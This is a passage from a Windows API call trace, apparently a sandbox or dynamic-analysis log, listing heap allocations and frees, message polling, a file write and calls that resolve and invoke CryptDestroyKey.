dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.853] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0259.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0259.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0259.853] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0259.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa518) returned 0x2f3d490 [0259.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0259.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0259.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0259.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0259.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0259.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0259.857] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.858] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.858] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.858] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.858] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.858] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.865] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.866] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.867] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0xa518, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0xa518, lpOverlapped=0x0) returned 1 [0259.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0259.869] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0259.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0259.869] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0259.869] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.870] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.870] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.870] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0259.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51af0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0259.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.871] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0259.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.871] CryptDestroyKey (hKey=0xa87490) returned 1 [0259.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0259.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.872] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 